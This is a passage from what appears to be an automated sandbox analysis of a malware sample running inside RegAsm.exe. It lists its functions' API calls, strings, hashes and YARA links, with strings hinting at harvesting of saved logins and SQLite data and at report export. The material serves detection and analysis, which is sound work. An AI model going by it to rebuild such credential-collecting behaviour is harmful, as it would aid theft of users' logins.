                                                          • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                          • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                          Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Item$Dialog$MessageSend
                                                          • String ID:
                                                          • API String ID: 3975816621-0
                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                          Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                          • String ID: .save$http://$https://$log profile$signIn
                                                          • API String ID: 1214746602-2708368587
                                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                          • String ID:
                                                          • API String ID: 4218492932-0
                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                          • memcpy.MSVCRT ref: 0044A8BF
                                                          • memcpy.MSVCRT ref: 0044A90C
                                                          • memcpy.MSVCRT ref: 0044A988
                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                          • memcpy.MSVCRT ref: 0044A9D8
                                                          • memcpy.MSVCRT ref: 0044AA19
                                                          • memcpy.MSVCRT ref: 0044AA4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memset
                                                          • String ID: gj
                                                          • API String ID: 438689982-4203073231
                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                          Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                          • API String ID: 3510742995-2446657581
                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                          Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                          • memset.MSVCRT ref: 00405ABB
                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                          • SetFocus.USER32(?), ref: 00405B76
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$FocusItemmemset
                                                          • String ID:
                                                          • API String ID: 4281309102-0
                                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                          Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfwcscat
                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                          • API String ID: 384018552-4153097237
                                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                          Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                          • String ID: 0$6
                                                          • API String ID: 2029023288-3849865405
                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                          Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                          • memset.MSVCRT ref: 00405455
                                                          • memset.MSVCRT ref: 0040546C
                                                          • memset.MSVCRT ref: 00405483
                                                          • memcpy.MSVCRT ref: 00405498
                                                          • memcpy.MSVCRT ref: 004054AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$memcpy$ErrorLast
                                                          • String ID: 6$\
                                                          • API String ID: 404372293-1284684873
                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                          Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AttributesErrorFileLastSleep$??3@
                                                          • String ID:
                                                          • API String ID: 1040972850-0
                                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                          Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                          • wcscpy.MSVCRT ref: 0040A107
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                          • String ID:
                                                          • API String ID: 1331804452-0
                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                          Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                          • String ID: advapi32.dll
                                                          • API String ID: 2012295524-4050573280
                                                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                          Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                          • <%s>, xrefs: 004100A6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf
                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                          • API String ID: 3473751417-2880344631
                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                          Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscat$_snwprintfmemset
                                                          • String ID: %2.2X
                                                          • API String ID: 2521778956-791839006
                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                          Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfwcscpy
                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                          • API String ID: 999028693-502967061
                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                          Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 004116FF
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                          • API String ID: 2618321458-3614832568
                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                          Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 004185FC
                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@AttributesFilememset
                                                          • String ID:
                                                          • API String ID: 776155459-0
                                                          • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                          • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                          Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                          • malloc.MSVCRT ref: 00417524
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                          • String ID:
                                                          • API String ID: 2308052813-0
                                                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PathTemp$??3@
                                                          • String ID: %s\etilqs_$etilqs_
                                                          • API String ID: 1589464350-1420421710
                                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastMessage_snwprintf
                                                          • String ID: Error$Error %d: %s
                                                          • API String ID: 313946961-1552265934
                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: foreign key constraint failed$new$oid$old
                                                          • API String ID: 0-1953309616
                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                          Memory Dump Source
